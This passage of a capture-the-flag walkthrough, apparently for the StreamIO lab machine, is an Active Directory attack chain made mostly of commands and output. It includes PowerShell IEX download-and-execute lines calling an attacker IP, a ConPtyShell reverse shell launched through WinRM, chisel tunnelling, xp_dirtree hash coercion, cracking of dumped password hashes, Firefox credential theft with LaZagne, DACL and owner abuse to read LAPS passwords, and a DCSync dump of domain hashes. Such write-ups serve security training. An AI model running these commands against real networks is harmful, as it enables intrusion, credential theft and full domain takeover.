PS C:\Windows\Tasks> IEX(IWR http://10.10.14.44:8000/adPEAS.ps1 -UseBasicParsing) 
PS C:\Windows\Tasks> Invoke-adPEAS 
```

There are some interesting bits in the scan result:

```text
[?] +++++ Checking DCSync Permissions +++++
[+] Filtering found identities that can perform DCSync in domain '': 
[+] The identity 'Martin' is a non-default account and can DCSync a domain controller 
sAMAccountName:                         Martin
distinguishedName:                      CN=Martin Smith,CN=Users,DC=streamIO,DC=htb
objectSid:                              S-1-5-21-1470860369-1569627196-4264678630-1105
memberOf:                               CN=Remote Management Users,CN=Builtin,DC=streamIO,DC=htb 
                                        CN=Administrators,CN=Builtin,DC=streamIO,DC=htb
pwdLastSet:                             05/26/2022 16:16:42 
lastLogonTimestamp:                     11/29/2023 19:55:35
userAccountControl:                     NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, NOT_DELEGATED 
[+] admincount:                         This identity is or was member of a high privileged admin group
```

`Martin` is an `Administrator` and can perform DCsync.

```text
[+] Found members in group 'BUILTIN\Access Control Assistance Operators': 
sAMAccountName:                         nikk37 
distinguishedName:                      CN=nikk37,CN=Users,DC=streamIO,DC=htb
objectSid:                              S-1-5-21-1470860369-1569627196-4264678630-1106
memberOf:                               CN=Remote Management Users,CN=Builtin,DC=streamIO,DC=htb
pwdLastSet:                             02/22/2022 01:57:16
lastLogonTimestamp:                     02/22/2022 01:57:16
userAccountControl:                     NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD 
```

`nikk37` belongs to `Remote Management Users` group.

## MSSQL enumeration

Port 1433 is only available internally. We can [chisel](https://github.com/jpillora/chisel) to forward the port.  
On my VM:

```console
opcode@debian$ ./chisel server -p 9999 --reverse -v
```

On the box:

```console
PS C:\Windows\Tasks> iwr 10.10.14.44:8000/chisel.exe -o chisel.exe
PS C:\Windows\Tasks> .\chisel.exe client 10.10.14.44:9999 R:1433:127.0.0.1:1433
```

We can use [impacket](https://github.com/fortra/impacket)'s `mssqlclient.py` to interact with MSSQL:

```console
opcode@debian$ mssqlclient.py streamIO.htb/db_admin:'B1@hx31234567890'@127.0.0.1
Impacket v0.12.0.dev1+20231012.22017.2de29184 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC): Line 1: Changed database context to 'master'.
[*] INFO(DC): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands

SQL (db_admin  db_admin@master)> enum_db
name              is_trustworthy_on   
---------------   -----------------   
master                            0   
tempdb                            0   
model                             0   
msdb                              1   
STREAMIO                          0   
streamio_backup                   0   

SQL (db_admin  db_admin@master)> enum_owner
Database          Owner                    
---------------   ----------------------   
master            sa                       
tempdb            sa                       
model             sa                       
msdb              sa                       
STREAMIO          streamIO\Administrator   
streamio_backup   streamIO\Administrator   

SQL (db_admin  db_admin@master)> enum_impersonate
execute as   database   permission_name   state_desc   grantee   grantor   
----------   --------   ---------------   ----------   -------   -------   

```

I also tried coercion via `xp_dirtree` in MSSQL to get NetNTLMv2 encrypted challenge.

```console
SQL (db_admin  db_admin@master)> xp_dirtree \\10.10.14.44\opcode
[%] exec master.sys.xp_dirtree '\\10.10.14.44\opcode',1,1
subdirectory   depth   file   
------------   -----   ----   
```

We get a challenge, but I don't think it can be cracked:

```text
[SMB] NTLMv2-SSP Client   : 10.10.11.158
[SMB] NTLMv2-SSP Username : streamIO\DC$
[SMB] NTLMv2-SSP Hash     : DC$::streamIO:bd3d7bf981e82807:91299E6E9F1AA4E4E8EF6740FFCE40E9:01010000000000008059F4877323DA0107AB8FF8548849E2000000000200080053004E003700430001001E00570049004E002D005300420038004700500034003000420059003800310004003400570049004E002D00530042003800470050003400300042005900380031002E0053004E00370043002E004C004F00430041004C000300140053004E00370043002E004C004F00430041004C000500140053004E00370043002E004C004F00430041004C00070008008059F4877323DA0106000400020000000800300030000000000000000000000000300000115A9657E72AE677A819F91E35937604131CA10870D3B39756FC84DE39089ADD0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00330038000000000000000000
```

I also wanted to try [MSSqlPwner](https://github.com/ScorpionesLabs/MSSqlPwner)

```console
opcode@debian$ git clone https://github.com/ScorpionesLabs/MSSqlPwner.git
opcode@debian$ cd MSSqlPwner 
opcode@debian$ python3 -m venv msp
opcode@debian$ source msp/bin/activate
(msp) opcode@debian$ python3 -m pip install -r requirements.txt
```

It can be used now:

```console
(msp) opcode@parrot$ python3 MSSqlPwner.py streamIO.htb/db_admin:'B1@hx31234567890'@127.0.0.1 interactive
[*] Connecting to 127.0.0.1:1433 as db_admin
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC): Line 1: Changed database context to 'master'.
[*] INFO(DC): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[*] Discovered hostname: SQLEXPRESS
[*] Server information from SQLEXPRESS (db_admin@master/db_admin) is retrieved
[*] Done!
[*] Enumeration completed successfully
[*] Saving state to file
[*] Chosen linked server: SQLEXPRESS
MSSqlPwner#SQLEXPRESS (db_admin@master/db_admin)> get-chain-list
[*] Chosen linked server: SQLEXPRESS
[*] Chain list:
[*] 057e4806-3346-442c-8eb2-f8d7cdf25237 - SQLEXPRESS (db_admin@master/db_admin) (db_admin db_admin@master)
```

Nothing useful here.

We can try exploring the `streamio_backup` database which was previously not accessible:

```console
SQL (db_admin  db_admin@master)> USE streamio_backup

SQL (db_admin  db_admin@streamio_backup)> SELECT name FROM streamio_backup..sysobjects WHERE xtype = 'U'
name     
------   
movies   
users    

SQL (db_admin  db_admin@streamio_backup)> SELECT * from users
id   username                                             password                                             
--   --------------------------------------------------   --------------------------------------------------   
 1   nikk37                                               389d14cb8e4e9b94b137deb1caf0612a                     
 2   yoshihide                                            b779ba15cedfd22a023c4d8bcf5f2332                     
 3   James                                                c660060492d9edcaa8332d89c99c9239                     
 4   Theodore                                             925e5408ecb67aea449373d668b7359e                     
 5   Samantha                                             083ffae904143c4796e464dac33c1f7d                     
 6   Lauren                                               08344b85b329d7efd611b7a7743e8a09                     
 7   William                                              d62be0dc82071bccc1322d64ec5b6c51                     
 8   Sabrina                                              f87d3c0d6c8fd686aacc6627f1f493a5                     
```

Some of them crack on <https://crackstation.net/>:

```text
nikk37:get_dem_girls2@yahoo.com
yoshihide:66boysandgirls..
Lauren:##123a8j8w5123##
Sabrina:!!sabrina$
```

`nikk37` is another user on the box:

```console
PS C:\> net user

User accounts for \\DC

-------------------------------------------------------------------------------
Administrator            Guest                    JDgodd
krbtgt                   Martin                   nikk37
yoshihide
The command completed successfully.
```

We can verify the password:

```console
opcode@debian$ sudo ntpdate streamIO.htb
opcode@debian$ echo nikk37 | kerbrute passwordspray --dc 10.10.11.158 -d streamIO.htb - 'get_dem_girls2@yahoo.com' -v

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 02/01/24 - Ronnie Flathers @ropnop

2023/11/30 10:21:07 >  Using KDC(s):
2023/11/30 10:21:07 >   10.10.11.158:88

2023/11/30 10:21:13 >  [+] VALID LOGIN:  nikk37@streamIO.htb:get_dem_girls2@yahoo.com
2023/11/30 10:21:13 >  Done! Tested 1 logins (1 successes) in 5.407 seconds
```

## Post-credential enumeration

Now that we have a set of credentials, we can enumerate more.  
Starting with SMB shares:

```console
root@af911fbf33e2:~# nxc smb 10.10.11.158 -d streamIO.htb -u 'nikk37' -p 'get_dem_girls2@yahoo.com' --shares
SMB         10.10.11.158  445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:streamIO.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.158  445    DC               [+] streamIO.htb\nikk37:get_dem_girls2@yahoo.com 
SMB         10.10.11.158  445    DC               [*] Enumerated shares
SMB         10.10.11.158  445    DC               Share           Permissions     Remark
SMB         10.10.11.158  445    DC               -----           -----------     ------
SMB         10.10.11.158  445    DC               ADMIN$                          Remote Admin
SMB         10.10.11.158  445    DC               C$                              Default share
SMB         10.10.11.158  445    DC               IPC$            READ            Remote IPC
SMB         10.10.11.158  445    DC               NETLOGON        READ            Logon server share 
SMB         10.10.11.158  445    DC               SYSVOL          READ            Logon server share 
```

No new shares are accessible. We can perform rid cycling because `IPC$` is readable:

```console
root@af911fbf33e2:~# nxc smb 10.10.11.158 -d streamIO.htb -u 'nikk37' -p 'get_dem_girls2@yahoo.com' --rid-brute 10000
SMB         10.10.11.158  445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:streamIO.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.158  445    DC               [+] streamIO.htb\nikk37:get_dem_girls2@yahoo.com 
SMB         10.10.11.158  445    DC               498: streamIO\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.158  445    DC               500: streamIO\Administrator (SidTypeUser)
SMB         10.10.11.158  445    DC               501: streamIO\Guest (SidTypeUser)
SMB         10.10.11.158  445    DC               502: streamIO\krbtgt (SidTypeUser)
SMB         10.10.11.158  445    DC               512: streamIO\Domain Admins (SidTypeGroup)
SMB         10.10.11.158  445    DC               513: streamIO\Domain Users (SidTypeGroup)
SMB         10.10.11.158  445    DC               514: streamIO\Domain Guests (SidTypeGroup)
SMB         10.10.11.158  445    DC               515: streamIO\Domain Computers (SidTypeGroup)
SMB         10.10.11.158  445    DC               516: streamIO\Domain Controllers (SidTypeGroup)
SMB         10.10.11.158  445    DC               517: streamIO\Cert Publishers (SidTypeAlias)
SMB         10.10.11.158  445    DC               518: streamIO\Schema Admins (SidTypeGroup)
SMB         10.10.11.158  445    DC               519: streamIO\Enterprise Admins (SidTypeGroup)
SMB         10.10.11.158  445    DC               520: streamIO\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.11.158  445    DC               521: streamIO\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.158  445    DC               522: streamIO\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.11.158  445    DC               525: streamIO\Protected Users (SidTypeGroup)
SMB         10.10.11.158  445    DC               526: streamIO\Key Admins (SidTypeGroup)
SMB         10.10.11.158  445    DC               527: streamIO\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.11.158  445    DC               553: streamIO\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.11.158  445    DC               571: streamIO\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.158  445    DC               572: streamIO\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.158  445    DC               1000: streamIO\DC$ (SidTypeUser)
SMB         10.10.11.158  445    DC               1101: streamIO\DnsAdmins (SidTypeAlias)
SMB         10.10.11.158  445    DC               1102: streamIO\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.11.158  445    DC               1103: streamIO\SQLServer2005SQLBrowserUser$DC (SidTypeAlias)
SMB         10.10.11.158  445    DC               1104: streamIO\JDgodd (SidTypeUser)
SMB         10.10.11.158  445    DC               1105: streamIO\Martin (SidTypeUser)
SMB         10.10.11.158  445    DC               1106: streamIO\nikk37 (SidTypeUser)
SMB         10.10.11.158  445    DC               1107: streamIO\yoshihide (SidTypeUser)
SMB         10.10.11.158  445    DC               1108: streamIO\CORE STAFF (SidTypeGroup)
```

We can also check a few other bits:

```console
root@af911fbf33e2:~# nxc smb 10.10.11.158 -d streamIO.htb -u 'nikk37' -p 'get_dem_girls2@yahoo.com' -M enum_av
SMB         10.10.11.158  445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:streamIO.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.158  445    DC               [+] streamIO.htb\nikk37:get_dem_girls2@yahoo.com 
ENUM_AV     10.10.11.158  445    DC               Found NOTHING!

root@af911fbf33e2:~# nxc ldap 10.10.11.158 -d streamIO.htb -u 'nikk37' -p 'get_dem_girls2@yahoo.com' -M adcs
SMB         10.10.11.158  445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:streamIO.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.158  389    DC               [+] streamIO.htb\nikk37:get_dem_girls2@yahoo.com 
ADCS        10.10.11.158  389    DC               [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'

root@af911fbf33e2:~# nxc ldap 10.10.11.158 -d streamIO.htb -u 'nikk37' -p 'get_dem_girls2@yahoo.com' -M maq
SMB         10.10.11.158  445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:streamIO.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.158  389    DC               [+] streamIO.htb\nikk37:get_dem_girls2@yahoo.com 
MAQ         10.10.11.158  389    DC               [*] Getting the MachineAccountQuota
MAQ         10.10.11.158  389    DC               MachineAccountQuota: 0
```

And some groups:

```console
root@af911fbf33e2:~# nxc ldap 10.10.11.158 -d streamIO.htb -u 'nikk37' -p 'get_dem_girls2@yahoo.com' -M group-mem -o group='Remote Management Users'
SMB         10.10.11.158  445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:streamIO.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.158  389    DC               [+] streamIO.htb\nikk37:get_dem_girls2@yahoo.com 
GROUP-ME... 10.10.11.158  389    DC               [+] Found the following members of the Remote Management Users group:
GROUP-ME... 10.10.11.158  389    DC               Martin
GROUP-ME... 10.10.11.158  389    DC               nikk37

root@af911fbf33e2:~# nxc ldap 10.10.11.158 -d streamIO.htb -u 'nikk37' -p 'get_dem_girls2@yahoo.com' -M group-mem -o group='Administrators'
SMB         10.10.11.158  445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:streamIO.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.158  389    DC               [+] streamIO.htb\nikk37:get_dem_girls2@yahoo.com 
GROUP-ME... 10.10.11.158  389    DC               [+] Found the following members of the Administrators group:
GROUP-ME... 10.10.11.158  389    DC               Administrator
GROUP-ME... 10.10.11.158  389    DC               Enterprise Admins
GROUP-ME... 10.10.11.158  389    DC               Domain Admins
GROUP-ME... 10.10.11.158  389    DC               Martin

root@af911fbf33e2:~# nxc ldap 10.10.11.158 -d streamIO.htb -u 'nikk37' -p 'get_dem_girls2@yahoo.com' -M group-mem -o group='Protected Users'
SMB         10.10.11.158  445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:streamIO.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.158  389    DC               [+] streamIO.htb\nikk37:get_dem_girls2@yahoo.com 

root@af911fbf33e2:~# nxc ldap 10.10.11.158 -d streamIO.htb -u 'nikk37' -p 'get_dem_girls2@yahoo.com' -M group-mem -o group='Domain Computers'
SMB         10.10.11.158  445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:streamIO.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.158  389    DC               [+] streamIO.htb\nikk37:get_dem_girls2@yahoo.com 

root@af911fbf33e2:~# nxc ldap 10.10.11.158 -d streamIO.htb -u 'nikk37' -p 'get_dem_girls2@yahoo.com' -M group-mem -o group='CORE STAFF'
SMB         10.10.11.158  445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:streamIO.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.158  389    DC               [+] streamIO.htb\nikk37:get_dem_girls2@yahoo.com 
```

`Martin` and `nikk37` are present in `Remote Management Users` group. This box has no PKI.  
`Martin` is also in the group `Administrators`

Therefore, we can get a WinRM shell:

```console
root@af911fbf33e2:~# nxc winrm 10.10.11.158 -d streamIO.htb -u 'nikk37' -p 'get_dem_girls2@yahoo.com' -X 'IEX(IWR http://10.10.14.44:8000/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.10.14.44 9001'
```

I tried running [PrivescCheck](https://github.com/itm4n/PrivescCheck):

```console
PS C:\Windows\Tasks> IEX(IWR http://10.10.14.44:8000/PrivescCheck.ps1 -UseBasicParsing)
PS C:\Windows\Tasks> Invoke-PrivescCheck -Extended
```

```text
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ CATEGORY ┃ TA0043 - Reconnaissance                           ┃
┃ NAME     ┃ Non-default applications                          ┃
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
┃ Get information about non-default and third-party            ┃
┃ applications by searching the registry and the default       ┃
┃ install locations.                                           ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Status: Informational 

Name                         FullName
----                         --------
IIS                          C:\Program Files (x86)\IIS
iis express                  C:\Program Files (x86)\iis express
Microsoft SQL Server         C:\Program Files (x86)\Microsoft SQL Server
Mozilla Firefox              C:\Program Files (x86)\Mozilla Firefox
Mozilla Maintenance Service  C:\Program Files (x86)\Mozilla Maintenance Service
PHP                          C:\Program Files (x86)\PHP
iis express                  C:\Program Files\iis express
LAPS                         C:\Program Files\LAPS
Microsoft                    C:\Program Files\Microsoft
Microsoft SQL Server         C:\Program Files\Microsoft SQL Server
Microsoft Visual Studio 10.0 C:\Program Files\Microsoft Visual Studio 10.0
PHP                          C:\Program Files\PHP
runphp                       C:\Program Files\runphp
VMware                       C:\Program Files\VMware
VMware Tools                 C:\Program Files\VMware\VMware Tools
```

Out of these, LAPS and Mozilla Firefox catch my eye.

```text
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓ 
┃ CATEGORY ┃ TA0043 - Reconnaissance                           ┃
┃ NAME     ┃ Local administrators group                        ┃
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
┃ Get information about the users and groups in the local      ┃
┃ 'Administrators' group.                                      ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Status: Informational 

Name              Type  IsLocal IsEnabled
----              ----  ------- ---------
Administrator     User     True      True
Enterprise Admins Group       0      True
Domain Admins     Group       0      True
Martin            User     True      True
```

Once again, `Martin` is pointed out. It is likely a LAPS box, so he'd be the one to have root flag.

After that, I tried running [WinPEAS](https://github.com/carlospolop/PEASS-ng/)

```console
PS C:\Windows\Tasks> iwr 10.10.14.44:8000/winPEASany.exe -o winPEASany.exe
PS C:\Windows\Tasks> .\winPEASany.exe
```

It points out a Firefox DB:

```console
+----------¦ Looking for Firefox DBs
+  https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#browsers-history
    Firefox credentials file exists at C:\Users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release\key4.db
+ Run SharpWeb (https://github.com/djhohnstein/SharpWeb)
```

I tried running [SharpWeb](https://github.com/djhohnstein/SharpWeb)

```console
PS C:\Windows\Tasks> iwr 10.10.14.44:8000/SharpWeb.exe -o SharpWeb.exe
PS C:\Windows\Tasks> .\SharpWeb.exe firefox 

=== Checking for Firefox (Current User) === 
```

The tool is rather old; we can try the gold standard [LaZagne](https://github.com/AlessandroZ/LaZagne) instead.

```console
PS C:\Windows\Tasks> iwr 10.10.14.44:8000/LaZagne.exe -o LaZagne.exe
PS C:\Windows\Tasks> .\LaZagne.exe all 

|====================================================================| 
|                                                                    | 
|                        The LaZagne Project                         | 
|                                                                    | 
|                          ! BANG BANG !                             | 
|                                                                    | 
|====================================================================| 
 

########## User: nikk37 ##########

------------------- Firefox passwords -----------------

[+] Password found !!!
URL: https://slack.streamio.htb
Login: nikk37
Password: n1kk1sd0p3t00:)

[+] Password found !!!
URL: https://slack.streamio.htb
Login: JDgodd
Password: password@12

[+] Password found !!!
URL: https://slack.streamio.htb
Login: admin
Password: JDg0dd1s@d0p3cr3@t0r

[+] Password found !!!
URL: https://slack.streamio.htb
Login: yoshihide
Password: paddpadd@12


[+] 4 passwords have been found.
For more information launch it again with the -v option
```

Or something lighter: [ThunderFox](https://github.com/V1V1/SharpScribbles/tree/master/ThunderFox)

```console
PS C:\Windows\Tasks> .\ThunderFox.exe creds 

     _____ _                     _          ______
    |_   _| |                   | |         |  ___|
      | | | |__  _   _ _ __   __| | ___ _ __| |_ _____  __     
      | | | '_ \| | | | '_ \ / _` |/ _ \ '__|  _/ _ \ \/ /     
      | | | | | | |_| | | | | (_| |  __/ |  | || (_) >  <      
      \_/ |_| |_|\__,_|_| |_|\__,_|\___|_|  \_| \___/_/\_\     


[*] Command: Mozilla Credentials

[*] Checking for Firefox installation as current user (nikk37) 

[i] Reading credentials from 'C:\Users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release\logins.json' 
[i] Using this database file 'C:\Users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release\key4.db'     

----- Mozilla Credential -----       

Hostname: https://slack.streamio.htb 
Username: admin
Password: JDg0dd1s@d0p3cr3@t0r       

[--SNIP--]
```

We could also have transferred `logins.json` and `key4.db` to our linux VM and used [firepwd](https://github.com/lclevy/firepwd)  
We can validate the password `JDg0dd1s@d0p3cr3@t0r` for `JDgodd`

```console
opcode@debian$ sudo ntpdate streamIO.htb
opcode@debian$ echo JDgodd | kerbrute passwordspray --dc 10.10.11.158 -d streamIO.htb - 'JDg0dd1s@d0p3cr3@t0r' -v

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 02/12/24 - Ronnie Flathers @ropnop

2024/02/12 03:10:22 >  Using KDC(s):
2024/02/12 03:10:22 >   10.10.11.158:88

2024/02/12 03:10:27 >  [+] VALID LOGIN:  JDgodd@streamIO.htb:JDg0dd1s@d0p3cr3@t0r
2024/02/12 03:10:27 >  Done! Tested 1 logins (1 successes) in 5.477 seconds
```

## Abusing `WriteOwner` over group with `impacket`

`JDgodd` does not belong to the `Remote Management Users` group. We can rely on Bloodhound to find possible exploit paths.  
For ingestor, I prefer to use [NetExec](https://github.com/Pennyw0rth/NetExec)'s `--bloodhound` option over [BloodHound.py](https://github.com/fox-it/bloodhound.py) when machine accounts are involved:

```console
root@af911fbf33e2:~# python3 -m pip install pycryptodome
root@af911fbf33e2:~# echo '10.10.11.158 DC.streamIO.htb watch.streamIO.htb streamIO.htb DC' >> /etc/hosts
root@af911fbf33e2:~# nxc ldap 10.10.11.158 -d streamIO.htb -u 'JDgodd' -p 'JDg0dd1s@d0p3cr3@t0r' --bloodhound -ns 10.10.11.158 -c All
SMB         10.10.11.158  445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:streamIO.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.158  389    DC               [+] streamIO.htb\JDgodd:JDg0dd1s@d0p3cr3@t0r
LDAP        10.10.11.158  389    DC               Resolved collection methods: psremote, localadmin, acl, container, rdp, session, group, objectprops, trusts, dcom
LDAP        10.10.11.158  389    DC               Done in 00M 22S
LDAP        10.10.11.158  389    DC               Compressing output into /root/.nxc/logs/DC_10.10.11.158_2024-02-11_214934bloodhound.zip
```

Get the file out of the container with:

```console
opcode@debian$ docker cp netexec:/root/.nxc/logs/DC_10.10.11.158_2024-02-11_214934bloodhound.zip ~/
```

We can now start neo4j with:

```console
opcode@debian$ sudo neo4j console
```

Finally, we can run the BloodHound binary:

```console
opcode@debian$ ./BloodHound --in-process-gpu
```

I marked `JDgodd` as owned, and under the query "Shortest path from Owned Principals", I learnt that `JDgodd` has `WriteOwner` privilege over the group `CORE STAFF` and members of this group can read LAPS password.

![3](images/3.png)

[impacket](https://github.com/fortra/impacket) can be used to abuse this privilege remotely, but the feature PRs have not been merged yet.

```console
opcode@debian$ mkdir impacket_exegol && cd impacket_exegol
opcode@debian$ python3 -m venv venv
opcode@debian$ source venv/bin/activate
(venv) opcode@debian$ git clone https://github.com/ThePorgs/impacket.git
(venv) opcode@debian$ cd impacket
(venv) opcode@debian$ python3 -m pip install -r requirements.txt
(venv) opcode@debian$ python3 -m pip install .
```

With the setup out of the way, we can run the command:

```console
(venv) opcode@debian$ owneredit.py streamIO.htb/JDgodd:'JDg0dd1s@d0p3cr3@t0r' -action write -new-owner 'JDgodd' -target 'CORE STAFF'
Impacket for Exegol - v0.10.1.dev1+20231106.134307.9aa93730 - Copyright 2022 Fortra - forked by ThePorgs

[*] Current owner information below
[*] - SID: S-1-5-21-1470860369-1569627196-4264678630-1104
[*] - sAMAccountName: JDgodd
[*] - distinguishedName: CN=JDgodd,CN=Users,DC=streamIO,DC=htb
[*] OwnerSid modified successfully!
```

We also need to use `dacledit.py`:

```console
(venv) opcode@debian$ dacledit.py streamIO.htb/JDgodd:'JDg0dd1s@d0p3cr3@t0r' -action write -rights FullControl -principal 'JDgodd' -target 'CORE STAFF'
Impacket for Exegol - v0.10.1.dev1+20231106.134307.9aa93730 - Copyright 2022 Fortra - forked by ThePorgs

[*] DACL backed up to dacledit-20240211-233119.bak
[*] DACL modified successfully!
```

```console
(venv) opcode@debian$ net.py streamIO.htb/JDgodd:'JDg0dd1s@d0p3cr3@t0r'@DC.streamIO.htb group -join 'JDgodd' -name 'CORE STAFF'
Impacket v0.12.0.dev1+20231012.22017.2de29184 - Copyright 2023 Fortra

[*] Adding user account 'JDgodd' to group 'CORE STAFF'
[+] User account added to CORE STAFF succesfully!
```

To read LAPS password, `ldapsearch` can be used:

```console
opcode@debian$ ldapsearch -LLL -x -H ldap://10.10.11.158 -D 'streamio\JDgodd' -w 'JDg0dd1s@d0p3cr3@t0r' -b "dc=streamio,dc=htb" "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
dn: CN=DC,OU=Domain Controllers,DC=streamIO,DC=htb
ms-Mcs-AdmPwd: I-YwJhy][jZ4e$

# refldap://ForestDnsZones.streamIO.htb/DC=ForestDnsZones,DC=streamIO,DC=htb

# refldap://DomainDnsZones.streamIO.htb/DC=DomainDnsZones,DC=streamIO,DC=htb

# refldap://streamIO.htb/CN=Configuration,DC=streamIO,DC=htb
```

Perform DCsync with `secretsdump.py`:

```console
opcode@debian$ secretsdump.py streamIO.htb/Administrator:'I-YwJhy][jZ4e$'@dc.streamIO.htb -just-dc
Impacket v0.12.0.dev1+20231012.22017.2de29184 - Copyright 2023 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f2f7bfac4b37ea67acdf948e81973e66:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:5f5142aae3cce656285ce4504605dec1:::
JDgodd:1104:aad3b435b51404eeaad3b435b51404ee:8846130392c4169cb552fe5b73b046af:::
Martin:1105:aad3b435b51404eeaad3b435b51404ee:a9347432fb0034dd1814ca794793d377:::
nikk37:1106:aad3b435b51404eeaad3b435b51404ee:17a54d09dd09920420a6cb9b78534764:::
yoshihide:1107:aad3b435b51404eeaad3b435b51404ee:6d21f46be3697ba16b6edef7b3399bf4:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:927c1cf2dd2a1785b6fad2df01a5e867:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:82c15d9addebcdde8425b5a3d56c63a3e212548c66d6389cfc736441c66640cb
Administrator:aes128-cts-hmac-sha1-96:0f0c95db58406881881e8a5eac593477
Administrator:des-cbc-md5:f231794fc10bf2df
krbtgt:aes256-cts-hmac-sha1-96:668ee76d84bf5ea1e845933ace27ecde98b736f218c0830cbe71e18812166cda
krbtgt:aes128-cts-hmac-sha1-96:f91f8540a9aca4af627959d1cb888f13
krbtgt:des-cbc-md5:d032029279fbc4fd
JDgodd:aes256-cts-hmac-sha1-96:53fcc54b04d560253b0fdb259b9de0da8c5c65916d12b5e4b5dd4723d9003443
JDgodd:aes128-cts-hmac-sha1-96:22e9e5268e40d1fc8198415fdd6c64bd
JDgodd:des-cbc-md5:76d0fe1a231934e5
Martin:aes256-cts-hmac-sha1-96:d5eed6cafcabd393a2101f4fadc143344c48ebaacb065490510ef608424065f0
Martin:aes128-cts-hmac-sha1-96:0a0cff37d02d1299a24fe58debb20392
Martin:des-cbc-md5:570bfd51e9f7e3bf
nikk37:aes256-cts-hmac-sha1-96:d4a44efe5740231cad3da85c294b01678840ac7a5b6207f366c36fc3c5b59347
nikk37:aes128-cts-hmac-sha1-96:eaff7bb14b5c41f80e5216cb09e16435
nikk37:des-cbc-md5:ae5ddf8fc2853e67
yoshihide:aes256-cts-hmac-sha1-96:0849b8c4eaee4edeaed2972752529251bbb616e9f24e08992923b4f18e9d73b0
yoshihide:aes128-cts-hmac-sha1-96:d668308ea96ebda1d31e3bb77b8e6768
yoshihide:des-cbc-md5:3bae5257ea029d61
